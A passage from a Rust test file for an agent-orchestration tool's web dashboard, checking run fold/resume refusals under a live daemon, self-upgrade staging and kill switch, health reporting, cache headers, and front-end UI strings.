8916 write_run(&runs, id, RunStatus::Implementing);
8917
8918 let mut beat = crate::daemon::Status::new();
8919 beat.current = vec![crate::daemon::Current {
8920 task: "20260901-000000-task".to_owned(),
8921 run: id.to_owned(),
8922 }];
8923 beat.updated_at = jiff::Timestamp::now();
8924 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8925 .expect("publish a heartbeat");
8926
8927 let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
8928 assert_eq!(res.status, 409);
8929 assert!(
8930 res.json()["error"]
8931 .as_str()
8932 .unwrap()
8933 .contains("live daemon"),
8934 "folding under a running agent would pull its worktree away"
8935 );
8936 }
8937
8938 #[tokio::test]
8939 async fn fold_merged_requires_a_pr_url() {
8940 let fx = Fixture::start().await;
8941 let runs = fx.runs();
8942 let id = "20260901-000000-nourl";
8943 write_run(&runs, id, RunStatus::Blocked);
8944
8945 let res = fx
8946 .post(&format!("/api/runs/{id}/fold-merged"), Some("{}"))
8947 .await;
8948 assert_eq!(res.status, 400, "{}", res.body);
8949
8950 let blank = fx
8951 .post(
8952 &format!("/api/runs/{id}/fold-merged"),
8953 Some(r#"{"pr_url":" "}"#),
8954 )
8955 .await;
8956 assert_eq!(blank.status, 400, "{}", blank.body);
8957 }
8958
8959 #[tokio::test]
8960 async fn fold_merged_is_404_for_an_unknown_run() {
8961 let fx = Fixture::start().await;
8962 let res = fx
8963 .post(
8964 "/api/runs/nosuchrun/fold-merged",
8965 Some(r#"{"pr_url":"https://github.com/owner/repo/pull/1"}"#),
8966 )
8967 .await;
8968 assert_eq!(res.status, 404, "{}", res.body);
8969 }
8970
8971 #[tokio::test]
8972 async fn fold_merged_is_refused_while_a_daemon_is_working_on_the_run() {
8973 let fx = Fixture::start().await;
8974 let runs = fx.runs();
8975 let id = "20260901-000000-livemerge";
8976 write_run(&runs, id, RunStatus::Blocked);
8977
8978 let mut beat = crate::daemon::Status::new();
8979 beat.current = vec![crate::daemon::Current {
8980 task: "20260901-000000-task".to_owned(),
8981 run: id.to_owned(),
8982 }];
8983 beat.updated_at = jiff::Timestamp::now();
8984 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8985 .expect("publish a heartbeat");
8986
8987 let res = fx
8988 .post(
8989 &format!("/api/runs/{id}/fold-merged"),
8990 Some(r#"{"pr_url":"https://github.com/owner/repo/pull/1"}"#),
8991 )
8992 .await;
8993 assert_eq!(res.status, 409, "{}", res.body);
8994 assert!(
8995 res.json()["error"]
8996 .as_str()
8997 .unwrap()
8998 .contains("live daemon"),
8999 "correcting a run's merge underneath a running agent would race \
9000 whatever it is doing to the same `status`/`merge` fields"
9001 );
9002 }
9003
9004 #[tokio::test]
9009 async fn fold_merged_refuses_a_pull_request_it_cannot_confirm_is_merged() {
9010 let fx = Fixture::start().await;
9011 let runs = fx.runs();
9012 let id = "20260901-000000-unconfirmed";
9013 write_run(&runs, id, RunStatus::Blocked);
9014
9015 let res = fx
9016 .post(
9017 &format!("/api/runs/{id}/fold-merged"),
9018 Some(r#"{"pr_url":"https://github.com/owner/repo/pull/1"}"#),
9019 )
9020 .await;
9021 assert_eq!(res.status, 400, "{}", res.body);
9022 assert_eq!(
9023 read_run(&runs, id).unwrap().status,
9024 RunStatus::Blocked,
9025 "a pull request that could not be confirmed merged must leave \
9026 the run exactly where it was"
9027 );
9028 }
9029
9030 #[tokio::test]
9031 async fn resume_is_refused_unless_the_run_stopped_somewhere_it_can_continue() {
9032 let fx = Fixture::start().await;
9033 let runs = fx.runs();
9034
9035 for (status, word) in [
9041 (RunStatus::Merged, "merged"),
9042 (RunStatus::Ready, "ready"),
9043 (RunStatus::Failed, "failed"),
9044 ] {
9045 let id = format!("20260901-000000-{}", &word[..4]);
9046 write_run(&runs, &id, status);
9047 let res = fx.post(&format!("/api/runs/{id}/resume"), None).await;
9048 assert_eq!(res.status, 409, "{word} must not be resumable");
9049 let err = res.json()["error"].as_str().unwrap().to_owned();
9050 assert!(err.contains(word), "the refusal names the status: {err}");
9051 }
9052
9053 let mid = "20260901-000000-midf";
9058 write_run(&runs, mid, RunStatus::Reviewing);
9059 let res = fx.post(&format!("/api/runs/{mid}/resume"), None).await;
9060 assert_eq!(res.status, 202, "an interrupted run is resumable");
9061 }
9062
9063 #[tokio::test]
9064 async fn resume_is_refused_while_the_loop_is_running() {
9065 let fx = Fixture::start().await;
9066 let runs = fx.runs();
9067 let stalled = "20260901-000000-stal";
9068 write_run(&runs, stalled, RunStatus::Stalled);
9069
9070 let mut beat = crate::daemon::Status::new();
9074 beat.current = vec![crate::daemon::Current {
9075 task: "20260901-000000-task".to_owned(),
9076 run: "20260901-000000-othr".to_owned(),
9077 }];
9078 beat.updated_at = jiff::Timestamp::now();
9079 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
9080 .expect("publish a heartbeat");
9081
9082 let res = fx.post(&format!("/api/runs/{stalled}/resume"), None).await;
9083 assert_eq!(res.status, 409);
9084 let err = res.json()["error"].as_str().unwrap().to_owned();
9085 assert!(err.contains("othr"), "it names what the loop is on: {err}");
9086 assert!(err.contains("stop it first"), "{err}");
9087 }
9088
9089 #[test]
9090 fn a_run_cannot_be_resumed_twice_at_once() {
9091 let home = TempDir::new().expect("temp home");
9092 let ui = Ui::new(
9093 Queue::at(home.path().join("queue")),
9094 Questions::at(home.path().join("questions")),
9095 Talks::at(home.path().join("talks")),
9096 home.path().join("runs"),
9097 home.path().to_path_buf(),
9098 PathBuf::from("/repo"),
9099 )
9100 .with_worktrees_root(home.path().join("wt"));
9101 let first = ui.begin_resume("20260901-000000-once").expect("claimed");
9102 let again = ui.begin_resume("20260901-000000-once");
9103 assert!(again.is_err(), "a second tap must not start a second graph");
9104 drop(first);
9105 assert!(
9106 ui.begin_resume("20260901-000000-once").is_ok(),
9107 "and the claim is released when the attempt ends"
9108 );
9109 }
9110
9111 #[test]
9112 fn talk_thinking_tracks_only_its_held_turn_claim() {
9113 let home = TempDir::new().expect("temp home");
9114 let ui = Ui::new(
9115 Queue::at(home.path().join("queue")),
9116 Questions::at(home.path().join("questions")),
9117 Talks::at(home.path().join("talks")),
9118 home.path().join("runs"),
9119 home.path().to_path_buf(),
9120 PathBuf::from("/repo"),
9121 )
9122 .with_worktrees_root(home.path().join("wt"));
9123 let id = "20260901-000000-once";
9124
9125 assert!(!ui.is_thinking(id), "an unclaimed talk is not thinking");
9126 let turn = ui.begin_talk_turn(id).expect("claim turn");
9127 assert!(ui.is_thinking(id), "the held guard is reported as thinking");
9128 assert!(
9129 !ui.is_thinking("20260901-000000-other"),
9130 "one talk's turn does not make another talk busy"
9131 );
9132 drop(turn);
9133 assert!(!ui.is_thinking(id), "dropping the guard releases thinking");
9134 }
9135
9136 #[tokio::test]
9137 async fn an_upgrade_is_refused_when_the_loop_belongs_to_another_process() {
9138 let fx = Fixture::start().await;
9139 let mut beat = crate::daemon::Status::new();
9143 beat.pid = 4321;
9144 beat.updated_at = jiff::Timestamp::now();
9145 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
9146 .expect("publish a heartbeat");
9147
9148 let res = fx.post("/api/upgrade", None).await;
9149 assert_eq!(res.status, 409);
9150 let err = res.json()["error"].as_str().unwrap().to_owned();
9151 assert!(err.contains("4321"), "the refusal names the owner: {err}");
9152 assert!(err.contains("old one against the same queue"), "{err}");
9153 }
9154
9155 #[test]
9162 fn recheck_never_spawns_when_checking_is_off_or_killed_by_env() {
9163 assert!(!should_spawn_recheck(&crate::config::Update {
9164 mode: UpdateMode::Off,
9165 interval: None,
9166 }));
9167
9168 unsafe {
9171 std::env::set_var(crate::updater::NO_AUTOUPDATE_ENV, "1");
9172 }
9173 let killed = should_spawn_recheck(&crate::config::Update {
9174 mode: UpdateMode::Notify,
9175 interval: None,
9176 });
9177 unsafe {
9178 std::env::remove_var(crate::updater::NO_AUTOUPDATE_ENV);
9179 }
9180 assert!(
9181 !killed,
9182 "MAGI_NO_AUTOUPDATE must stop the periodic recheck, not just the \
9183 one-time startup check"
9184 );
9185
9186 assert!(should_spawn_recheck(&crate::config::Update {
9187 mode: UpdateMode::Notify,
9188 interval: None,
9189 }));
9190 }
9191
9192 #[test]
9198 fn recheck_poll_period_tracks_a_short_configured_interval() {
9199 let short = crate::config::Update {
9200 mode: UpdateMode::Notify,
9201 interval: Some("1m".to_owned()),
9202 };
9203 let period = recheck_poll_period(&short);
9204 assert!(
9205 period <= Duration::from_secs(30),
9206 "a one-minute interval must wake the task far sooner than the \
9207 default ceiling, or the deck would not notice within the \
9208 interval the operator configured: got {period:?}"
9209 );
9210
9211 let default = crate::config::Update {
9212 mode: UpdateMode::Notify,
9213 interval: None,
9214 };
9215 assert_eq!(
9216 recheck_poll_period(&default),
9217 UPDATE_RECHECK_POLL_MAX,
9218 "the default day-long interval should poll at the (capped) \
9219 ceiling rather than needlessly often"
9220 );
9221 }
9222
9223 #[test]
9231 fn recheck_skips_the_network_before_the_interval_elapses() {
9232 let dir = TempDir::new().expect("temp dir");
9233 let path = dir.path().join("state.json");
9234 let state = kaishin::UpdateCheckState {
9235 last_checked_unix: jiff::Timestamp::now().as_second() as u64,
9236 last_known_latest: None,
9237 last_known_url: None,
9238 };
9239 kaishin::save_check_state(&path, &state).expect("seed a just-checked state");
9240
9241 let checker = crate::updater::Checker::for_test(Duration::from_secs(24 * 60 * 60), path);
9242 assert!(
9243 !update_recheck_due(&checker, None),
9244 "a check made moments ago must not be repeated before the \
9245 configured interval elapses"
9246 );
9247 }
9248
9249 #[test]
9255 fn recheck_defers_to_an_upgrade_already_in_flight() {
9256 let dir = TempDir::new().expect("temp dir");
9257 let path = dir.path().join("state.json");
9258 let checker = crate::updater::Checker::for_test(Duration::from_secs(60 * 60), path);
9259 let progress = crate::updater::Progress::new("0.8.0".to_owned(), "v0.9.0".to_owned());
9260
9261 assert!(
9262 !update_recheck_due(&checker, Some(&progress)),
9263 "a recheck must not run while an upgrade this deck started is \
9264 still moving"
9265 );
9266 }
9267
9268 #[tokio::test]
9269 async fn an_upgrade_is_refused_by_the_no_autoupdate_kill_switch() {
9270 unsafe {
9282 std::env::set_var(crate::updater::NO_AUTOUPDATE_ENV, "1");
9283 }
9284 let fx = Fixture::start().await;
9285 let res = fx.post("/api/upgrade", None).await;
9286 unsafe {
9287 std::env::remove_var(crate::updater::NO_AUTOUPDATE_ENV);
9288 }
9289 assert_eq!(res.status, 200, "not 202: nothing was set in motion");
9290 let body = res.json();
9291 assert!(body["to"].is_null(), "there was no release to move to");
9292 assert!(body["parked"].is_null(), "and nothing was parked");
9293 assert!(
9294 body["detail"]
9295 .as_str()
9296 .unwrap()
9297 .contains("disabled by MAGI_NO_AUTOUPDATE"),
9298 "{body:?}"
9299 );
9300 }
9301
9302 #[tokio::test]
9303 async fn an_upgrade_with_nothing_to_install_changes_nothing() {
9304 let repo = TempDir::new().expect("repo dir");
9320 std::fs::write(repo.path().join("magi.toml"), "[update]\nmode = \"off\"\n")
9321 .expect("write magi.toml");
9322 let fx = Fixture::with_repo(repo.path().to_path_buf()).await;
9323
9324 let res = fx.post("/api/upgrade", None).await;
9330 assert_eq!(res.status, 200, "not 202: nothing was set in motion");
9331 let body = res.json();
9332 assert!(body["to"].is_null(), "there was no release to move to");
9333 assert!(body["parked"].is_null(), "and nothing was parked");
9334 assert!(
9335 body["detail"]
9336 .as_str()
9337 .unwrap()
9338 .contains("nothing restarted"),
9339 "{body:?}"
9340 );
9341 }
9342
9343 #[tokio::test]
9344 async fn health_reports_the_running_version_and_no_pending_upgrade_by_default() {
9345 let repo = TempDir::new().expect("repo dir");
9350 std::fs::write(repo.path().join("magi.toml"), "[update]\nmode = \"off\"\n")
9351 .expect("write magi.toml");
9352 let fx = Fixture::with_repo(repo.path().to_path_buf()).await;
9353
9354 let health = fx.get("/api/health").await.json();
9355 assert_eq!(health["version"], env!("CARGO_PKG_VERSION"));
9356 assert_eq!(
9357 health["update"]["available"], false,
9358 "checking is off, which reads as \"unknown\", not \"none\""
9359 );
9360 assert!(health["update"]["to"].is_null());
9361 assert!(
9362 health["upgrade"].is_null(),
9363 "nothing has ever asked this deck to upgrade"
9364 );
9365 }
9366
9367 #[tokio::test]
9368 async fn health_reports_a_parked_upgrade_and_what_it_is_waiting_on() {
9369 let fx = Fixture::start().await;
9370 write_run(&fx.runs(), "20260905-000000-cd51", RunStatus::Implementing);
9371
9372 let mut progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
9373 progress.parked_run = Some("20260905-000000-cd51".to_owned());
9374 progress.advance(crate::updater::Stage::Parking);
9375 crate::updater::write_progress(fx.home.path(), &progress).expect("write upgrade.json");
9376
9377 let health = fx.get("/api/health").await.json();
9378 assert_eq!(health["upgrade"]["stage"], "parking");
9379 assert_eq!(health["upgrade"]["from"], "0.5.1");
9380 assert_eq!(health["upgrade"]["to"], "0.5.2");
9381 let waiting_on = health["upgrade"]["waiting_on"]
9382 .as_str()
9383 .expect("waiting_on is set while parking a known run");
9384 assert!(waiting_on.contains("cd51"), "{waiting_on}");
9385 assert!(waiting_on.contains("implementing"), "{waiting_on}");
9386 }
9387
9388 #[tokio::test]
9389 async fn health_reports_a_finished_upgrade_with_no_waiting_on() {
9390 let fx = Fixture::start().await;
9391 let mut progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
9392 progress.advance(crate::updater::Stage::Done);
9393 crate::updater::write_progress(fx.home.path(), &progress).expect("write upgrade.json");
9394
9395 let health = fx.get("/api/health").await.json();
9396 assert_eq!(health["upgrade"]["stage"], "done");
9397 assert!(
9398 health["upgrade"]["waiting_on"].is_null(),
9399 "nothing to wait on once it is done"
9400 );
9401 }
9402
9403 #[tokio::test]
9404 async fn hand_over_advances_the_upgrade_progress_through_parking_and_restarting() {
9405 let home = TempDir::new().expect("temp home");
9406 let runs = home.path().join("runs");
9407 std::fs::create_dir_all(&runs).expect("runs dir");
9408 let ui = Ui::new(
9409 Queue::at(home.path().join("queue")),
9410 Questions::at(home.path().join("questions")),
9411 Talks::at(home.path().join("talks")),
9412 runs,
9413 home.path().to_path_buf(),
9414 PathBuf::from("/repo/magi"),
9415 )
9416 .with_launch(launch_idle);
9417 let looping = ui.looping();
9418 let listener = tokio::net::TcpListener::bind((Ipv4Addr::LOCALHOST, 0))
9419 .await
9420 .expect("bind loopback");
9421 let served = tokio::spawn(axum::serve(listener, ui.router()).into_future());
9422
9423 let progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
9424 crate::updater::write_progress(home.path(), &progress).expect("seed progress");
9425
9426 hand_over(home.path(), &looping, served, || Ok(()))
9427 .await
9428 .expect("hand over");
9429
9430 let after = crate::updater::read_progress(home.path()).expect("progress on disk");
9431 assert_eq!(
9432 after.stage,
9433 crate::updater::Stage::Restarting,
9434 "hand_over owns the record through parking and up to restarting; \
9435 the successor is what finishes it"
9436 );
9437 }
9438
9439 #[test]
9440 fn the_upgrade_button_arms_before_it_restarts_anything() {
9441 assert!(APP_JS.contains("upgrade: \"/api/upgrade\""));
9444 assert!(APP_JS.contains("Replace the binary and restart?"));
9445 assert!(APP_JS.contains("function confirmed("));
9446 assert!(APP_JS.contains("show(upgradeBtn, !foreign && update.available)"));
9451 assert!(
9455 APP_JS.contains("Parking, then restarting"),
9456 "the button says what it is waiting for"
9457 );
9458 assert!(APP_JS.contains("if (!out.to)"));
9461 }
9462
9463 #[test]
9464 fn stopping_the_loop_arms_but_starting_does_not() {
9465 assert!(APP_JS.contains("Finish the run(s) in flight, then stop claiming?"));
9468 assert!(APP_JS.contains("Stop claiming new tasks? Nothing is in flight."));
9469 assert!(APP_JS.contains("confirmed(button, question)"));
9470 assert!(!APP_JS.contains("setText(btn, \"Update & restart\");\n }\n }, 6000)"));
9473 assert!(APP_JS.contains("const label = btn.textContent;"));
9474 assert!(!APP_JS.contains("Neither direction is guarded"));
9475 }
9476
9477 #[test]
9478 fn the_running_version_is_shown_regardless_of_whether_an_update_exists() {
9479 assert!(
9480 APP_JS.contains("state.health.version"),
9481 "the operator wants to know what is running even with nothing newer"
9482 );
9483 assert!(APP_JS.contains("id=\"daemon-version\"") || APP_CSS.contains(".daemon-version"));
9484 }
9485
9486 #[test]
9487 fn the_upgrade_button_names_its_destination() {
9488 assert!(
9489 APP_JS.contains("`Update to ${update.to}`"),
9490 "pressing the button should not be a surprise about what it moves to"
9491 );
9492 }
9493
9494 #[test]
9495 fn an_upgrade_in_progress_is_shown_as_stages_not_as_an_error() {
9496 for stage in ["downloading", "replaced", "parking", "restarting"] {
9497 assert!(
9498 APP_JS.contains(&format!("\"{stage}\"")),
9499 "the phone must be able to tell {stage} apart from the others"
9500 );
9501 }
9502 assert!(APP_JS.contains(".waiting_on"));
9503 assert!(APP_JS.contains("function reportUnreachableDuringUpgrade("));
9508 assert!(APP_JS.contains("reconnects on its own"));
9509 }
9510
9511 #[test]
9512 fn a_failed_upgrade_does_not_lock_the_loop_controls() {
9513 let body = &APP_JS[APP_JS.find("function renderLoop(").expect("renderLoop")
9522 ..APP_JS.find("function upgrade(").expect("upgrade")];
9523 assert!(
9524 !body.contains(
9525 "upgradeStage === \"failed\") {\n setAttr(box, \"data-state\", \"failed\")"
9526 ),
9527 "a failed upgrade must not take the whole strip over the way it used to"
9528 );
9529 assert!(
9530 body.contains("upgradeFailNote"),
9531 "the failure has to reach the loop's own note instead"
9532 );
9533 assert_eq!(
9537 body.matches("upgradeFailNote].filter(Boolean).join")
9538 .count(),
9539 2,
9540 "both loop-why writers (quiet and control) must fold the note in"
9541 );
9542 }
9543
9544 #[test]
9545 fn an_overdue_upgrade_eventually_asks_for_a_human() {
9546 assert!(APP_JS.contains("UPGRADE_WAIT_LIMIT_MS = 70 * 60 * 1000"));
9549 assert!(APP_JS.contains("function upgradeOverdue("));
9550 }
9551
9552 #[test]
9553 fn coming_back_from_an_upgrade_says_which_version_it_landed_on() {
9554 assert!(
9555 APP_JS.contains("Updated to ${upgradeInfo.to"),
9556 "the operator who asked for the restart wants to know it worked"
9557 );
9558 }
9559
9560 #[test]
9561 fn an_error_is_visible_from_where_the_button_is() {
9562 let alert = &APP_CSS[APP_CSS.find(".alert {").expect(".alert")
9567 ..APP_CSS.find(".alert-text").expect(".alert-text")];
9568 assert!(
9569 alert.contains("position: fixed"),
9570 "an error about the thing under your thumb has to be visible from \
9571 where your thumb is: {alert}"
9572 );
9573 assert!(
9574 alert.contains("z-index: 25"),
9575 "above the dock (20) and the run-actions FAB (15), so neither \
9576 buries it: {alert}"
9577 );
9578 assert!(
9579 alert.contains("var(--tap)"),
9580 "and clear of the dock and the home indicator: {alert}"
9581 );
9582 assert!(
9585 alert.contains("var(--s4) + var(--tap) + var(--s3)"),
9586 "the FAB's column stays free: {alert}"
9587 );
9588 }
9589
9590 #[tokio::test]
9591 async fn an_older_attempt_says_what_replaced_it() {
9592 let fx = Fixture::start().await;
9593 let q = fx.queue();
9594 let runs = fx.runs();
9595 let (first, second) = ("20260901-000000-aaaa", "20260901-000000-bbbb");
9596 write_run(&runs, first, RunStatus::Stalled);
9597 write_run(&runs, second, RunStatus::Blocked);
9598
9599 let mut t = Task::new(
9600 "one task".to_owned(),
9601 "do it".to_owned(),
9602 PathBuf::from("/repo"),
9603 Source::Human,
9604 );
9605 t.runs = vec![first.to_owned(), second.to_owned()];
9606 q.put(&mut t).expect("put");
9607
9608 let rows = fx.get("/api/runs").await.json();
9612 let by = |short: &str| -> Value {
9613 rows.as_array()
9614 .unwrap()
9615 .iter()
9616 .find(|r| r["short"] == short)
9617 .cloned()
9618 .unwrap_or(Value::Null)
9619 };
9620 assert_eq!(by("aaaa")["superseded_by"], "bbbb");
9621 assert!(
9622 by("bbbb")["superseded_by"].is_null(),
9623 "the latest attempt is not superseded by anything"
9624 );
9625 assert!(APP_JS.contains("run.superseded_by"));
9627 assert!(APP_JS.contains("Superseded by"));
9628 }
9629
9630 #[tokio::test]
9631 async fn a_run_s_own_detail_page_says_what_replaced_it_too() {
9632 let fx = Fixture::start().await;
9637 let q = fx.queue();
9638 let runs = fx.runs();
9639 let (first, second) = ("20260901-000000-cccc", "20260901-000000-dddd");
9640 write_run(&runs, first, RunStatus::Blocked);
9641 write_run(&runs, second, RunStatus::Merged);
9642
9643 let mut t = Task::new(
9644 "one task".to_owned(),
9645 "do it".to_owned(),
9646 PathBuf::from("/repo"),
9647 Source::Human,
9648 );
9649 t.runs = vec![first.to_owned(), second.to_owned()];
9650 q.put(&mut t).expect("put");
9651
9652 let earlier = fx.get(&format!("/api/runs/{first}")).await.json();
9653 assert_eq!(earlier["superseded_by"], "dddd");
9654 assert_eq!(earlier["latest_attempt"]["id"], second);
9655 assert_eq!(earlier["latest_attempt"]["short"], "dddd");
9656 assert_eq!(
9657 earlier["latest_attempt"]["resolved"], true,
9658 "the run that replaced it landed, so this one reads as settled"
9659 );
9660
9661 let later = fx.get(&format!("/api/runs/{second}")).await.json();
9662 assert!(
9663 later["superseded_by"].is_null(),
9664 "the latest attempt is not superseded by anything"
9665 );
9666 assert!(
9667 later["latest_attempt"].is_null(),
9668 "the latest attempt has no later attempt of its own"
9669 );
9670
9671 assert!(APP_JS.contains("run.latest_attempt"));
9678 assert!(APP_JS.contains("data-superseded"));
9679 assert!(APP_JS.contains("#/runs/${latest.id}"));
9680 }
9681
9682 #[tokio::test]
9683 async fn a_chain_of_retries_points_the_oldest_at_the_current_head() {
9684 let fx = Fixture::start().await;
9690 let q = fx.queue();
9691 let runs = fx.runs();
9692 let (a, b, c) = (
9693 "20260901-000000-aaaa",
9694 "20260901-000000-bbbb",
9695 "20260901-000000-cccc",
9696 );
9697 write_run(&runs, a, RunStatus::Blocked);
9698 write_run(&runs, b, RunStatus::Blocked);
9699 write_run(&runs, c, RunStatus::Merged);
9700
9701 let mut t = Task::new(
9702 "retried twice".to_owned(),
9703 "do it".to_owned(),
9704 PathBuf::from("/repo"),
9705 Source::Human,
9706 );
9707 t.runs = vec![a.to_owned(), b.to_owned(), c.to_owned()];
9708 q.put(&mut t).expect("put");
9709
9710 let view = fx.get(&format!("/api/runs/{a}")).await.json();
9711 assert_eq!(view["superseded_by"], "bbbb", "the immediate successor");
9712 assert_eq!(
9713 view["latest_attempt"]["id"], c,
9714 "the chain's current head, not the intermediate Blocked retry"
9715 );
9716 assert_eq!(view["latest_attempt"]["resolved"], true);
9717
9718 let mid = fx.get(&format!("/api/runs/{b}")).await.json();
9719 assert_eq!(mid["latest_attempt"]["id"], c);
9720 assert_eq!(mid["latest_attempt"]["resolved"], true);
9721 }
9722
9723 #[tokio::test]
9724 async fn an_unresolved_or_unverified_successor_does_not_read_as_finished() {
9725 let fx = Fixture::start().await;
9726 let q = fx.queue();
9727 let runs = fx.runs();
9728
9729 let (still_blocked_a, still_blocked_b) = ("20260901-000000-e001", "20260901-000000-e002");
9732 write_run(&runs, still_blocked_a, RunStatus::Blocked);
9733 write_run(&runs, still_blocked_b, RunStatus::Blocked);
9734 let mut t1 = Task::new(
9735 "still stuck".to_owned(),
9736 "do it".to_owned(),
9737 PathBuf::from("/repo"),
9738 Source::Human,
9739 );
9740 t1.runs = vec![still_blocked_a.to_owned(), still_blocked_b.to_owned()];
9741 q.put(&mut t1).expect("put");
9742 let view1 = fx.get(&format!("/api/runs/{still_blocked_a}")).await.json();
9743 assert_eq!(view1["latest_attempt"]["resolved"], false);
9744
9745 let (noop_a, noop_b) = ("20260901-000000-e003", "20260901-000000-e004");
9750 write_run(&runs, noop_a, RunStatus::Blocked);
9751 write_run(&runs, noop_b, RunStatus::VerifiedNoop);
9752 let mut t2 = Task::new(
9753 "claims done".to_owned(),
9754 "do it".to_owned(),
9755 PathBuf::from("/repo"),
9756 Source::Human,
9757 );
9758 t2.runs = vec![noop_a.to_owned(), noop_b.to_owned()];
9759 q.put(&mut t2).expect("put");
9760 let view2 = fx.get(&format!("/api/runs/{noop_a}")).await.json();
9761 assert_eq!(
9762 view2["latest_attempt"]["resolved"], false,
9763 "an unverified no-op claim must not read as a confirmed finish"
9764 );
9765
9766 assert!(APP_JS.contains("latest.resolved"));
9769 }
9770
9771 #[tokio::test]
9772 async fn a_replaced_deck_is_not_served_from_a_phone_s_cache() {
9773 let fx = Fixture::start().await;
9774 let js = fx.get("/app.js").await;
9780 assert_eq!(js.status, 200);
9781 let tag = js
9782 .header("etag")
9783 .expect("an etag to revalidate against")
9784 .to_owned();
9785 assert!(tag.contains(env!("CARGO_PKG_VERSION")), "tag: {tag}");
9786 assert_eq!(
9787 js.header("cache-control"),
9788 Some("no-cache, must-revalidate"),
9789 "the phone has to ask every time"
9790 );
9791
9792 let again = fx
9795 .get_with("/app.js", &[("if-none-match", tag.as_str())])
9796 .await;
9797 assert_eq!(
9798 again.status, 304,
9799 "a deck it already has costs one round trip"
9800 );
9801 assert!(again.body.is_empty(), "304 carries no body");
9802
9803 let weak = fx
9806 .get_with("/app.js", &[("if-none-match", &format!("W/{tag}"))])
9807 .await;
9808 assert_eq!(weak.status, 304);
9809 let stale = fx
9810 .get_with("/app.js", &[("if-none-match", "\"0.0.1-1\"")])
9811 .await;
9812 assert_eq!(stale.status, 200, "an older build must be replaced");
9813 assert!(stale.body.contains("renderRunActions"));
9814 }
9815
9816 #[test]
9817 fn the_deck_never_sends_the_operator_to_a_terminal() {
9818 assert!(
9821 !APP_JS.contains("Run `magi fold` first"),
9822 "the deck must offer the fold, not prescribe a shell command"
9823 );
9824 assert!(APP_JS.contains("foldRun:"));
9825 assert!(APP_JS.contains("resumeRun:"));
9826 assert!(APP_JS.contains("renderRunActions"));
9827
9828 assert!(APP_JS.contains("armedFold"));
9830 assert!(APP_JS.contains("Yes, fold worktrees"));
9831
9832 assert!(APP_JS.contains("can no longer be resumed"));
9835 }
9836
9837 #[test]
9838 fn a_finished_run_explains_itself_with_its_own_last_line() {
9839 assert!(
9845 !APP_JS.contains("collapsed on agent quota"),
9846 "a stall must not be explained by a cause the deck did not check"
9847 );
9848 assert!(
9849 !APP_JS.contains("Review rounds ran out with findings still open, or the gate failed"),
9850 "and a block must not offer a guess with an `or` in it"
9851 );
9852
9853 assert!(
9857 APP_JS.contains("setText(r.event, run.event || \"\")"),
9858 "the run's last line is rendered unconditionally"
9859 );
9860 assert!(
9861 !APP_JS.contains("moving && run.event"),
9862 "and never gated on the run still moving"
9863 );
9864
9865 assert!(APP_JS.contains("lost to quota"));
9867 }
9868
9869 #[test]
9891 fn runs_tree_sections_and_state_chips_agree_on_what_a_run_can_be() {
9892 let shapes_marker = "const REPRESENTATIVE_RUN_SHAPES = [";
9893 let shapes_body_start =
9894 APP_JS.find(shapes_marker).expect("the shape list exists") + shapes_marker.len();
9895 let shapes_close = APP_JS[shapes_body_start..]
9896 .find("].map(")
9897 .expect("the shape list is closed by its done-computing .map(...)")
9898 + shapes_body_start;
9899 let shapes_src = &APP_JS[shapes_body_start..shapes_close];
9900
9901 let mut shapes: Vec<(bool, String, bool)> = Vec::new();
9902 for entry in shapes_src.split('{').skip(1) {
9903 let waiting = entry.contains("waiting: true");
9904 let dead = entry.contains("live: \"dead\"");
9905 let status_at =
9906 entry.find("status: \"").expect("each shape names a status") + "status: \"".len();
9907 let status_end = entry[status_at..]
9908 .find('"')
9909 .expect("the status string is closed")
9910 + status_at;
9911 shapes.push((waiting, entry[status_at..status_end].to_string(), dead));
9912 }
9913 assert!(shapes.len() >= 6, "parsed shapes: {shapes:?}");
9914
9915 let done_rule_marker = "done: !";
9919 let done_rule_at = APP_JS[shapes_close..]
9920 .find(done_rule_marker)
9921 .expect("the done rule follows the shape list")
9922 + shapes_close
9923 + done_rule_marker.len();
9924 let includes_at = APP_JS[done_rule_at..]
9925 .find(".includes(shape.status)")
9926 .expect("the done rule ends in .includes(shape.status)")
9927 + done_rule_at;
9928 let not_done: Vec<&str> = APP_JS[done_rule_at..includes_at]
9929 .trim()
9930 .trim_start_matches('[')
9931 .trim_end_matches(']')
9932 .split(',')
9933 .map(|s| s.trim().trim_matches('"'))
9934 .filter(|s| !s.is_empty())
9935 .collect();
9936
9937 let shapes: Vec<(bool, String, bool, bool)> = shapes
9938 .into_iter()
9939 .map(|(waiting, status, dead)| {
9940 let done = !not_done.contains(&status.as_str());
9941 (waiting, status, dead, done)
9942 })
9943 .collect();
9944
9945 fn run_section(waiting: bool, status: &str, dead: bool) -> &'static str {
9949 if waiting {
9950 return "waiting";
9951 }
9952 if dead
9953 && !matches!(
9954 status,
9955 "merged"
9956 | "ready"
9957 | "stalled"
9958 | "blocked"
9959 | "failed"
9960 | "verified_noop"
9961 | "superseded"
9962 )
9963 {
9964 return "stale";
9965 }
9966 match status {
9967 "merged" | "ready" => "landed",
9968 "stalled" | "blocked" | "failed" | "verified_noop" | "superseded" => "ended",
9969 _ => "flight",
9970 }
9971 }
9972
9973 fn filter_matches(filter_key: &str, waiting: bool, dead: bool, done: bool) -> bool {
9976 match filter_key {
9977 "active" => !done,
9978 "flight" => !done && !waiting && !dead,
9979 "stale" => !done && !waiting && dead,
9980 "waiting" => waiting,
9981 "done" => done,
9982 "all" => true,
9983 other => panic!("unknown RUN_STATE_FILTERS key: {other}"),
9984 }
9985 }
9986
9987 let compatible = |section: &str, filter_key: &str| {
9988 shapes.iter().any(|(waiting, status, dead, done)| {
9989 run_section(*waiting, status, *dead) == section
9990 && filter_matches(filter_key, *waiting, *dead, *done)
9991 })
9992 };
9993
9994 let expected = [
9999 ("waiting", [true, false, false, true, true, true]),
10000 ("stale", [true, false, true, false, false, true]),
10001 ("flight", [true, true, false, false, false, true]),
10002 ("landed", [false, false, false, false, true, true]),
10003 ("ended", [false, false, false, false, true, true]),
10004 ];
